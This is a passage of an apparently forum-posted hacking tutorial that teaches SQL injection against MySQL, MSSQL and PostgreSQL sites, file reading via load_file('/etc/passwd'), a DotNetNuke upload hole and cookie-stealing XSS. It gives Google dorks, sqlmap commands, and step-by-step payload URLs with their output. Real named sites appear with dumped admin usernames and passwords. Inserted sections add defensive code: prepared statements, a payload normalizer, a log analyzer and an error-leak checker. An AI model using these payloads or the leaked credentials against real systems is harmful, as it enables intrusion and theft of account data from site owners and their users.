6) Finding database version
As I said, we are going to take data from the second column. Instead of number 2 we are going to put
version() or @@version
Code:
http://site.com/book.php?id=-141+union+select+all+1,@@version,3,4,5,6,7--
On the page, where number 2 was, it will show the database version.
If the database version is 4 we have to guess the names of the table and column, but if the database
version is 5 we can read them from information_schema.
We have version 5.0.51a-24+lenny5, which means that we don't have to guess the table and column
names.
7) Finding table names
If the database version is 4 you won't be able to find the names of the table and columns; you have to
guess them. If the database version is 5, skip this step.
Names of some possible tables:
Code:
admin
admins
user
users
member
members
Names of some possible columns:
Code:
username
uname
un
user
name
nick
password
pw
pwd
passwd
If the database version is 5 we can get the table names with the next step: instead of number 2 we
put group_concat(table_name) and after the number of the last column
+from+information_schema.tables+where+table_schema=database()--
So we get this link:
Code:
http://site.com/book.php?id=-141+union+select+all+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables+where+table_schema=database()--
Instead of number 2 it showed the table names, in this case date, book, users. We are going to take
the columns from the users table.
8) Finding column name
We found the table we want and now we want to take its columns. Instead of
group_concat(table_name) we are going to put group_concat(column_name), and instead of
+from+information_schema.tables+where+table_schema=database()-- we are going to put
+from+information_schema.columns+where+table_name=hex--, where instead of hex we have to
put the table name encoded in hex.
Go to:
Code:
http://www.string-functions.com/string-hex.aspx
write the name of the table (in this case users) and we get the hex string 7573657273, so now we
can see the columns:
Code:
http://site.com/book.php?id=-141+union+select+all+1,group_concat(column_name),3,4,5,6,7+from+information_schema.columns+where+table_name=0x7573657273--
9) Taking data from columns
We got: id, name, surname, username, password, level.
We need only username and password.
Instead of group_concat(column_name) we put group_concat(username,0x3a,password); 0x3a is a
colon, used to separate the user from the password. Instead of
+from+information_schema.columns+where+table_name=0x7573657273-- we put +from+users--
and we have the link:
Code:
http://site.com/book.php?id=-141+union+select+all+1,group_concat(username,0x3a,password),3,4,5,6,7+from+users--
and the result, e.g.:
Code:
sebrezovski:1533562
seratum:seratum
coach:53.21.1985.
biga:biga
which is the users and passwords from this site.
10) Filter bypassing
In case writing union+select+all gives "not accessible", change it to UnIoN+sElEcT+aLl
On some sites the space is restricted, so you can put + or /**/ instead (/* starts a comment and */
ends it).
On some sites version() is also restricted, so you can use unhex(hex(version())).
11) Site protection from SQL Injection
Just put this code in your script:
Code:
<?php
// Stop the request if id is not a plain number (e.g. when someone appends ' or and+1=2).
if(!is_numeric($_GET['id']))
{
echo 'It is gonna write this text when someone tries to add \' or and+1=2';
exit;
}
?>
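As an added example (not the tutorial's own code), here is the book.php lookup from the walkthrough above rewritten with a PDO prepared statement: the id is validated as an integer and bound as a parameter, so neither the ' test nor a union select can reach the SQL parser, and database errors are logged instead of shown on the page. The database name, table, and credentials are assumptions.

```php
<?php
// Added example, not code from the original tutorial. Hardened version of the
// book.php?id= lookup used in the SQL injection walkthrough above.
// Assumed: a MySQL database "shop" with a table book(id INT, title VARCHAR)
// and a low-privilege account "app" (no FILE privilege, no access to mysql.user).

function fetchBook(PDO $db, string $rawId): ?array
{
    // 1. Validate before the value goes anywhere near SQL. FILTER_VALIDATE_INT
    //    rejects "141'", "141 and 1=2" and "-141 union select ..." alike.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    // 2. Query text and value travel separately: the server compiles the
    //    statement first and then receives the integer, so it is never parsed as SQL.
    $stmt = $db->prepare('SELECT id, title FROM book WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

try {
    $db = new PDO('mysql:host=localhost;dbname=shop;charset=utf8mb4', 'app', 'secret', [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepared statements
    ]);
    $book = fetchBook($db, (string) ($_GET['id'] ?? ''));
} catch (PDOException $e) {
    // 3. Log the detail, show nothing: "You have an error in your SQL syntax"
    //    on the page is exactly the signal the vulnerability check above looks for.
    error_log('book lookup failed: ' . $e->getMessage());
    http_response_code(500);
    exit('Temporary error');
}

if ($book === null) {
    http_response_code(404);
    exit('Not found');
}
echo htmlspecialchars($book['title'], ENT_QUOTES, 'UTF-8');
```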
SQL Injection - Load File :
You found a site with an SQL vulnerability; now you can try to access the table mysql.user and the file
privileges.
To see which user we are and whether we have access to the user table, we put 'user' in place of a
vulnerable column and at the end of the URL add '+from+mysql.user--'.
It should look like this:
Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,user,4+from+mysql.user--
If you get a username, it means that you have access to the mysql.user table and you can continue with
this tut.
Now, to see if we have file privileges, instead of 'user' we add 'concat(user,0x3a,file_priv)',
and of course '+from+mysql.user--'.
Now that the usernames and file privileges are listed on the page, you must find the username that was
shown at the start, when you put 'user' in the column. When you find it, and if a 'Y' (Yes) is shown
next to it, you have file privileges.
Load File:
All we have to do is to write on vulnerable column load_file('FILE NAME').
We gonna try with /etc/passwd, so we type in vulnerable column 'load_file('/etc/passwd').
Which looks like this:
Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file('/etc/passw
d'),4--
If it give us error we can convert file in Char or Hex, but if we do it we must delete " ' " in file
name.
Hex e.g.
If we convert file name in Hex, before file name we will add '0x'
Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file(0x2f6574632
f706173737764),4+from+mysql.user--
Hex code '2f6574632f706173737764' works for '/etc/passwd'.
It is recommended for Hex:
Code:
www.string-functions.com/string-hex.aspx
If you decide to convert file in Char then add 'load_file(char(converted file to char))'
Which looks like:
Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file(char(47,101
,116,99,47,112,97,115,115,119,100),4--
Where ' 47,101,116,99,47,112,97,115,115,119,100 ' works for '/etc/passwd'
Char converter:
Code:
http://pookey.co.uk/binary.php
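The case changes, /**/ comments, unhex(hex()) in section 10 and the hex and char() spellings of a file name above all exist to get past simple string matching. A detector that normalizes the request before matching sees through all of them. As an added example that is not from the tutorial, the Python below decodes those forms (and the CHR()||CHR() concatenation used in the PostgreSQL sections later on this page) and then matches a few signatures taken from this page's own payloads; the signature names and the normalize()/classify() functions are my own.

```python
import re
from urllib.parse import unquote_plus

def _hex_literal(m):
    digits = m.group(1)
    if len(digits) % 2:            # odd length cannot be a byte string; leave it alone
        return m.group(0)
    return bytes.fromhex(digits).decode("latin-1")

def normalize(raw):
    """Undo the evasions described on the page so a signature sees the real query:
    '+' and %xx URL encoding, /**/ comments, case changes, unhex(hex(x)),
    MySQL 0x.. literals and char(..) lists, PostgreSQL CHR(..)||CHR(..) chains."""
    s = unquote_plus(raw).lower()
    s = re.sub(r"/\*.*?\*/", " ", s)                               # /**/ used in place of spaces
    s = re.sub(r"unhex\(hex\((\w+\(\)|[^()]*)\)\)", r"\1", s)       # unhex(hex(version())) -> version()
    s = re.sub(r"0x([0-9a-f]+)", _hex_literal, s)                  # 0x2f657463 -> /etc
    s = re.sub(r"\bchar\(([\d\s,]+)\)",
               lambda m: "".join(chr(int(x)) for x in m.group(1).split(",") if x.strip()), s)
    s = re.sub(r"\bchr\((\d+)\)", lambda m: chr(int(m.group(1))), s)
    s = re.sub(r"\s*\|\|\s*", "", s)                               # a||b -> ab (string concatenation)
    return re.sub(r"\s+", " ", s).strip()

# Signatures built from the payload shapes shown on this page (names are mine).
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+select\b"),
    "load_file": re.compile(r"\bload_file\s*\("),
    "mysql_user": re.compile(r"\bmysql\.user\b"),
    "information_schema": re.compile(r"\binformation_schema\."),
    "version": re.compile(r"@@version|\bversion\s*\(\s*\)"),
    "etc_passwd": re.compile(r"/etc/passwd"),
}

def classify(raw):
    """Sorted names of the signatures that match the normalized request."""
    s = normalize(raw)
    return sorted(name for name, pat in SIGNATURES.items() if pat.search(s))

if __name__ == "__main__":
    url = "http://www.site.com/index.php?id=1+UnIoN/**/sElEcT/**/aLl/**/1,2,load_file(0x2f6574632f706173737764),4--"
    print(normalize(url))
    print(classify(url))
```

Normalizing before matching is what separates a detector from the blacklist the page bypasses: the signatures stay short and readable, and every encoding trick collapses to the same plain text.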
MSSQL Injection :
1) Finding number of columns
I will use:
Code:
http://www.site.com/sr/page/member.asp?id=234
To find the number of columns we use ORDER BY. We add +order+by+5-- at the end of the
link.
Code:
http://www.site.com/sr/page/member.asp?id=234+order+by+5--
So we get this error:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 5
is out of range of the number of items in the select list.
/sr/page/member.asp, line 38
which means that there are fewer than 5 columns, so let's try with 4. We get the same error, so we
try with 3 and get a different error:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the
keyword 'order'.
/sr/page/member.asp, line 44
which means that there are 3 columns.
2) Finding database version
To find the database version we use @@version.
Code:
http://www.site.com/sr/page/member.asp?id=-234+union+select+all+1,@@version,3--
and we get:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008
19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on
Windows NT 5.2 (Build 3790: Service Pack 2) ' to a column of data type int.
/sr/page/member.asp, line 38
and from here we can read the database version.
3) Finding table name
With MSSQL Injection it is not possible to get all tables at once; we must go one by one.
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,table_name,3+from+information_schema.tables--
and we get:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'Country' to a column of data type int.
/sr/page/member.asp, line 38
and we can see that we have a table called 'Country'.
Now we have to find the other tables. We use not+in. So we have the link:
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,table_name,3+from+information_schema.tables+where+table_name+not+in('Country')--
and we get:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'Admin' to a column of data type int.
/sr/page/member.asp, line 38
and from here we can see that we have an Admin table.
4) Finding column name
It is the same for columns. We cannot get all columns at once, so we have to do it one by one. In this
case we use where+table_name='Admin'--. So we have the link:
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,column_name,3+from+information_schema.columns+where+table_name='Admin'--
and we get the error:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'USERNAME' to a column of data type int.
/sr/page/member.asp, line 38
From here we can see that we have the column USERNAME. Now we need the rest of the columns, so
we use not+in again.
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,column_name,3+from+information_schema.columns+where+table_name='Admin'+and+column_name+not+in('USERNAME')--
and we get:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'PASSWD' to a column of data type int.
/sr/page/member.asp, line 38
So the next column is PASSWD.
5) Taking data from columns
Now we put the column name in place of table_name, and after from we enter
the name of the table.
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,USERNAME,3+from+Admin--
We get the username OjuZwqAul.
It is the same for the password:
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,PASSWD,3+from+Admin--
We get the password M7sWt2!2uq.
Blind SQL Injection :
1) Blind SQL Injection?
The difference between SQL Injection and Blind SQL Injection is that Blind SQL Injection does not
show any errors, table or column names, or column content. That is why it is called
Blind SQL. You only watch whether some part of the site disappears - an image, text, etc... In Blind
Injection we don't use -- or /* */.
2) Site vulnerability check
We have the link:
Code:
http://www.site.com/index.php?id=1
We will add and 1=2
Code:
http://www.site.com/index.php?id=1+and+1=2
If any part of the page disappears, it means that the site is vulnerable.
3) Finding database version
As we said already, in this method nothing is shown, so we assert that the database
version is 4. If part of the site disappears it means that the version is not 4, but if everything on the page stays
as it should, the version is 4. We use @@version.
Code:
http://www.site.com/index.php?id=1+and+substring(@@version,1,1)=4
If page is loaded as it should then version is 4, if not, then we will try:
Code:
http://www.site.com/index.php?id=1+and+substring(@@version,1,1)=5
4) MYSQL user
First we check whether we are able to use select, because it is sometimes blocked.
Code:
http://www.site.com/index.php?id=1+and+(select+1)=1
If the page loads normally we can use select; if not, we can't. Now we check
whether we have access to the MYSQL user table.
Code:
http://www.site.com/index.php?id=1+and+(SELECT+*+from+mysql.user+limit+0,1)=1
As with everything else, if the page loads normally we have access to mysql.user; if not, we
don't. mysql.user is useful for getting password hashes or using load_file() and OUTFILE.
5) Finding table name
To find table names all we can do is guess. First we find the table name, then the column
names in that table.
We have the link and we try the names of different tables. If the page loads normally it
means that the table exists.
Code:
http://www.site.com/index.php?id=1+and+(select+1+from+ime_tabele+limit+0,1)=1
(ime_tabele stands for the table name you are guessing.)
Our main objective is to find data from the admin table, so we can also try:
Code:
admin
administrator
member
login
members
adm
user
users
tbl_admin
6) Finding column name
Now that we found the table we wanted, it is time to find the column name. We do the same as
for the table: name matching; if the page loads normally then the column exists. We need
login data, so commonly the columns are:
Code:
username
admin
admin_username
uname
user
nick
password
pwrod
admin_password
pw
pass
The link we use for columns is:
Code:
http://www.sajt.com/index.php?id=1+and+(select+substring(concat(1,ime_kolone),1,1)+from+ime_tabele+limit+0,1)=1
(ime_kolone stands for the column name, ime_tabele for the table name.)
7) Taking data from columns
In the whole Blind SQL process this is the most tedious and longest part. Here we need an ASCII
table.
Code:
http://www.asciitable.com/
We will look only at the DEC and CHR columns of the ASCII table. First we get the username, letter
by letter. So we need to guess the DEC value of a letter, e.g. for A it is 65.
We have the link (column_name and table_name are placeholders):
Code:
http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_name)+from+table_name+limit+0,1),1,1))>DEC number
If the page loads normally we found a real letter of the username. To find the second letter change
+limit+0,1 to +limit+1,1.
So now we are guessing the second letter... It is the same for the password... So after a long, long time we get
the username and password. If there are more users and you want to get their passwords too, you
will have to add a where clause.
So it should look like:
Code:
http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_name)+from+table_name+where+column_name=something+limit+0,1),1,1))>DEC number
To use where on a second column_name we usually use id, but we can also use other things, e.g.
for id:
Code:
http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_name)+from+table_name+where+id=1+limit+0,1),1,1))>DEC number
8) Taking data from columns using sqlmap
As you have noticed already, you need a lot of time to get data from columns, so I would suggest you
use sqlmap.
Download:
Code:
http://sqlmap.org/
Python download:
Code:
http://www.python.org/download/
Now we have to find the directory where sqlmap is located.
Start>run>cmd and go to the sqlmap directory using cd.
The command to start sqlmap for getting data with Blind SQL Injection on Windows is:
Code:
sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name)"
NOTE: on unix put python before sqlmap.py
So it should look like:
Code:
python sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name)"
If there are more users, as I said, use id:
Code:
sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name where id=1)"
After -u you put the link.
After -p you put the parameter which is vulnerable (in our case id).
-a is used for a random user agent from txt/user-agents.txt
-v1 is verbose
After --string we put something that sqlmap will recognize as a sign that it found a letter (some part
of the text which disappears if the condition is false).
-e is the command that we want to execute. In our case this one:
Code:
SELECT concat(name_username_columns,0x3a,name_password_columns) from
table_name where userid=1
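The boolean checks in this section leave a distinctive trace in the web server access log: one client, many requests to the same parameter, each carrying and-conditions with ascii(substring(...)) and a changing comparison number, and responses alternating between two page sizes (the "part of the page disappears" signal seen from the server side). As an added example that is not part of the tutorial, the Python below parses a few constructed combined-format log lines and flags that pattern; the IP addresses, timestamps, sizes and the analyze() function are made up for the demonstration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from any real server), one request per line.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2014:10:00:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 5120
198.51.100.9 - - [01/Jan/2014:10:00:02 +0000] "GET /index.php?id=1+and+1=2 HTTP/1.1" 200 3010
198.51.100.9 - - [01/Jan/2014:10:00:03 +0000] "GET /index.php?id=1+and+substring(@@version,1,1)=5 HTTP/1.1" 200 5120
198.51.100.9 - - [01/Jan/2014:10:00:04 +0000] "GET /index.php?id=1+and+(select+1)=1 HTTP/1.1" 200 5120
198.51.100.9 - - [01/Jan/2014:10:00:05 +0000] "GET /index.php?id=1+and+ascii(substring((select+username+from+users+limit+0,1),1,1))>64 HTTP/1.1" 200 5120
198.51.100.9 - - [01/Jan/2014:10:00:06 +0000] "GET /index.php?id=1+and+ascii(substring((select+username+from+users+limit+0,1),1,1))>96 HTTP/1.1" 200 3010
198.51.100.9 - - [01/Jan/2014:10:00:07 +0000] "GET /index.php?id=1+and+ascii(substring((select+username+from+users+limit+0,1),1,1))>80 HTTP/1.1" 200 5120
203.0.113.5 - - [01/Jan/2014:10:00:08 +0000] "GET /index.php?id=2&sort=name HTTP/1.1" 200 4870
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3}) (\d+)')

# Boolean-blind shapes described on the page: "and 1=2", "and (select 1)=1",
# "and substring(@@version,1,1)=5", "and ascii(substring((select ...)))>N".
BLIND_RE = re.compile(r"\band\s+(?:\(?\s*select\b|ascii\s*\(|substring\s*\(|\d+\s*=\s*\d+)", re.I)
THRESHOLD_RE = re.compile(r"[<>=]\s*(\d+)\s*$")

def parse_line(line):
    """(ip, decoded path, status, size) or None for a line that is not a request."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, path, status, size = m.groups()
    return ip, unquote_plus(path), int(status), int(size)

def analyze(log_text, min_hits=3):
    """Clients whose blind-pattern request count reaches min_hits, with the comparison
    numbers they cycled through and the set of response sizes they received."""
    per_ip = defaultdict(lambda: {"hits": 0, "thresholds": [], "sizes": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path, status, size = rec
        if not BLIND_RE.search(path):
            continue
        entry = per_ip[ip]
        entry["hits"] += 1
        entry["sizes"].add(size)          # two distinct sizes = the true/false page pair
        t = THRESHOLD_RE.search(path)
        if t:
            entry["thresholds"].append(int(t.group(1)))
    return {ip: e for ip, e in per_ip.items() if e["hits"] >= min_hits}

if __name__ == "__main__":
    for ip, e in analyze(SAMPLE_LOG).items():
        print(ip, "hits:", e["hits"], "thresholds:", e["thresholds"], "sizes:", sorted(e["sizes"]))
```

The thresholds list is the tell: a human never sends >64, >96, >80 against the same parameter in sequence, but a binary search for one character does, and sqlmap does it at machine speed, which is why the same rule with a short time window catches the automated run from section 8 as well.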
Postgre SQL Injection :
1) Postgre SQL Injection?
Postgre SQL Injection is almost the same as SQL Injection. The difference is that the database is PostgreSQL, not
MySQL. It is a bit more complicated than the usual SQL Injection. There are some other functions
that we will use, as you will see.
2) Finding vulnerable sites
Finding vulnerable sites is the same as for the usual SQL Injection, which means that we can use Google
dorks.
Here are some:
Code:
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=
3) Site vulnerability check
You found a site that may be vulnerable. To check whether it is, we add ' at the end of the link.
Code:
http://www.link.com/page.php?page=1'
So if on the page we get:
Code:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at
or near
or some part of the page disappears, then the site is vulnerable.
4) Finding number of columns
So we know that the site is vulnerable; now we need to find the number of columns. We do it with
union this time.
Our link:
Code:
http://www.link.com/page.php?page=1+union+select+all+null--+-
If the page loads normally it means that there are more columns.
Code:
http://www.link.com/page.php?page=1+union+select+all+null,null,null,null from dual--
We keep adding null until we get an error. If we get an error with 7 nulls, it means that we have
6 columns, which means 6 nulls.
5) Finding vulnerable columns
It is easy to find which column is usable. Null = 0, so put something in place of a
certain null; if nothing happens, that column is not usable. That is how we
find the vulnerable column.
So:
Code:
http://www.link.com/page.php?page=1+union+select+all+current_database(),null,null,null--+-
If nothing is listed, it means that the column is not usable; we move on to the next and set this one
back to null.
6) Finding database version
We do this with the version() function.
This link will show us the version:
Code:
http://www.link.com/page.php?page=1+union+select+all+version(),null,null,null--+-
We will get something like:
Code:
PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu
4.4.3-4ubuntu5) 4.4.3, 32-bit
7) Finding table name
Same as the usual SQL Injection; the only difference is that instead of column numbers we have null.
So it should look like:
Code:
http://www.link.com/page.php?page=1+union+select+all+table_name,null,null,null+from+information_schema.tables--+-
We will get the table names and also the columns from the tables.
8) Finding column name
It is also easy, and there is no big difference.
This is how it should look:
Code:
http://www.link.com/page.php?page=1+union+select+all+column_name,null,null,null+from+information_schema.columns+where+table_name=users--+-
Sometimes this won't work, so we need to convert = to its ASCII decimal code (CHR(61)).
You can use this site:
Code:
http://easycalculation.com/ascii-hex.php
So we have the link:
Code:
http://www.link.com/page.php?page=1+union+select+all+column_name,null,null,null+from+information_schema.columns+where+table_name||CHR(61)||users--+-
9) Taking data from columns
Also almost the same as the usual SQL Injection:
Code:
http://www.link.com/page.php?page=1+union+select+all+username||CHR(58)||password+from+users--+-
Error based Postgre SQL Injection :
1) Error based Postgre SQL Injection?
Error based Postgre SQL Injection is a type of web attack related to the PostgreSQL database. The difference
is that you can get all tables, columns, values from columns etc. As the title says, the attack is based
on errors, and all results are shown in error messages.
2) Finding vulnerable sites
Use Google dorks:
Code:
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=
3) Site vulnerability check
Add ' at the end of the link:
Code:
http://www.link.com/page.php?page=1'
So if we get:
Code:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at
or near
the site is vulnerable.
4) Finding database version
Use the version() function. In this type of attack the query looks a bit more complicated than the usual SQL
Injection, so don't get confused.
Code:
http://www.link.com/page.php?page=1+and+1=cast(version()+as+int)--
If the query runs successfully you will get this on the page:
Code:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input
syntax for integer: "PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC
gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit"
from which we get the database version:
Code:
PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu
4.4.3-4ubuntu5) 4.4.3, 32-bit
5) Finding table name
As I said at the start, we are not able to get all tables at the same time, so we use limit and offset.
We use offset to say which result from the database we want to list.
Our link:
Code:
http://www.link.com/page.php?page=1+and+1=cast((select+table_name+from+information_schema.tables+limit+1+offset+0)+as+int)--
On the page we get this error:
Code:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input
syntax for integer: "pg_type"
From this we have the table pg_type.
To get the next table we change offset to 1:
Code:
http://www.link.com/page.php?page=1+and+1=cast((select+table_name+from+information_schema.tables+limit+1+offset+1)+as+int)--
and we get a table like pg_attribute.
6) Finding column name
First you have to convert the table name into decimal.
We will use:
Code:
http://easycalculation.com/ascii-hex.php
Type the string admin and you will get the decimal codes:
Code:
97 100 109 105 110
We change this a bit, so it looks like this:
Code:
CHR(97)+||+CHR(100)+||+CHR(109)+||+CHR(105)+||+CHR(110)
Now we put it in place of the table name and get the columns.
Code:
http://www.link.com/page.php?page=1+and+1=cast((select+column_name+from+information_schema.columns+where+table_name=CHR(97)+||+CHR(100)+||+CHR(109)+||+CHR(105)+||+CHR(110)+limit+1+offset+0)+as+int)--
and we get the column id. We keep changing offset until the site sends us back to the home page,
which means that there are no more columns in that table.
7) Taking data from columns
We found the columns username and password and now we want to get the data from them.
Code:
http://www.link.com/page.php?page=1+and+1=cast((select+username+||CHR(58)||+password+from+admin+limit+1+offset+0)+as+int)--
and we get this:
Code:
admin:21232f297a57a5a743894a0e4a801fc3
CHR(58) stands for the colon (:), and we use it to get two columns at the same time.
NOTE: (Regarding the whole tutorial) from now on I'm not going to explain things in detail, because I think you
should be able to figure it out by now. So I'm going to use pics and codes only.
SQL Injection on ASPX :
1) Site vulnerability check
Vulnerable link:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton
We will add order by 1--:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton order by 1--
If you get page error go to:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535
2) Finding column name
Go to:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 having 1=1
3) Finding table name
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1
table_name from information_schema.tables))
We want admin table, so we type next:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1
table_name from information_schema.tables where table_name not in
('Tab_FinalOrder')))
admin table name is AdminMaster
4) Finding columns in admin table
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1
column_name from information_schema.columns where table_name =
'AdminMaster'))
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1
column_name from information_schema.columns where table_name = 'AdminMaster'
and column_name not in ('Admin_name')))
Columns names:
5) Finding username and password
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1
Admin_name from AdminMaster))
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1
Admin_password from AdminMaster))
Code:
Username: admin
Password: pothys!@#
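The MSSQL, error-based PostgreSQL and ASPX sections above all rely on the same defect: the application returns the raw database driver error to the browser, and a type-conversion error echoes whatever the subquery selected. As an added example (not from the original tutorial), here is Python that recognizes those two error families in a response body, pulls out the echoed value, and shows the generic replacement a safe error handler would send instead. The error texts used in the checks are the ones quoted on this page plus the newer wording of the same SQL Server and PostgreSQL messages; the function names are my own.

```python
import re

# Errors that echo a query result, in the wording shown on the page for SQL Server
# (ODBC error 80040e07) and PostgreSQL (pg_query), plus the current wording of the
# same two errors (not on the page; taken from the vendors' later versions).
LEAK_PATTERNS = [
    ("mssql", re.compile(
        r"converting\s+the\s+nvarchar\s+value\s+'([^']*)'\s+to\s+(?:a\s+column\s+of\s+)?data\s+type\s+int")),
    ("postgresql", re.compile(
        r'invalid\s+input\s+syntax\s+for\s+(?:type\s+)?integer:\s+"([^"]*)"')),
]
# Database errors reaching the page without an echoed value: still a finding, the
# application is exposing raw driver errors (e.g. the ORDER BY probe in MSSQL step 1).
GENERIC_DB_ERROR = [
    ("mssql", re.compile(r"Microsoft OLE DB Provider for ODBC Drivers error '80040e\w\w'")),
    ("postgresql", re.compile(r"pg_query\(\).*?Query failed:\s*ERROR", re.S)),
]

def inspect_response(body):
    """(db, echoed_value) when a DB error leaks a query result, (db, None) when a raw
    DB error is present without a value, None for a clean response."""
    for db, pat in LEAK_PATTERNS:
        m = pat.search(body)
        if m:
            return db, m.group(1)
    for db, pat in GENERIC_DB_ERROR:
        if pat.search(body):
            return db, None
    return None

def safe_error_page(body, server_log):
    """What the application should do instead: keep the detail in the server-side
    log and hand the client a fixed message that carries no query output."""
    finding = inspect_response(body)
    if finding is None:
        return body
    server_log.append(body)
    return "An internal error occurred. The details have been logged."

if __name__ == "__main__":
    sample = ("Microsoft OLE DB Provider for ODBC Drivers error '80040e07'\n"
              "[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the\n"
              "nvarchar value 'Admin' to a column of data type int.\n/sr/page/member.asp, line 38")
    print(inspect_response(sample))        # ('mssql', 'Admin')
    log = []
    print(safe_error_page(sample, log))
```

Run inspect_response() over captured responses in a proxy or a response-side WAF rule and every step of those three sections becomes a single alert; run safe_error_page() in the application's error handler and the technique stops working entirely, because the echoed value never leaves the server.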
Dot net nuke :
DNN has a gallery which you can upload to a site and where you can hold pictures, like an
"online gallery". That gallery has a hole in it, so you can use it to upload files to the site with
extensions *.gif, *.jpg, *.pdf, *.txt, *.swf..
Google dork to find vulnerable sites:
Code:
inurl:fck/fcklinkgallery.aspx
I'm going to use this site:
Code:
http://kellyballancephotography.com/providers/htmleditorproviders/fck/fcklinkgallery.aspx
Now if the page loads it will look like this:
which means that we can continue. Now we choose option 3 -> File (A File On Your Site) and
we type javascript to upload a file.
Code:
javascript:__doPostBack('ctlURL$cmdUpload','')
Choose File and a button with the text Upload Selected File will show up.
*on this site the letter color matches the background, so you will have to select the whole page
(CTRL+A) to see the upload button.
Upload the file and access it by going to sitelink.com/portals/0/filename.extension
->
Code:
http://kellyballancephotography.com/portals/0/config.txt
XSS :
1) XSS?
XSS lets an attacker execute Javascript code. XSS is short for Cross Site Scripting.
You can use XSS in many ways: for simply executing Javascript commands, or to steal cookies. We
inject the stolen cookies so we can log in somewhere without the password.
2) Required stuff
Mozilla Firefox:
Code:
http://www.mozilla.org/en-US/products/download.html?product=firefox-3.0.5&os=win&lang=en-GB
Add-on Firebug:
Code:
https://addons.mozilla.org/en-US/firefox/addon/firebug/
Add-on FireCookie:
Code:
https://addons.mozilla.org/en-US/firefox/addon/firecookie/
Add-on Live HTTP Headers:
Code:
https://addons.mozilla.org/en-US/firefox/downloads/file/28118/live_http_headers-0.14-fx+sm.xpi
It is recommended to have basic knowledge of Javascript.
3) Testing XSS vulnerability
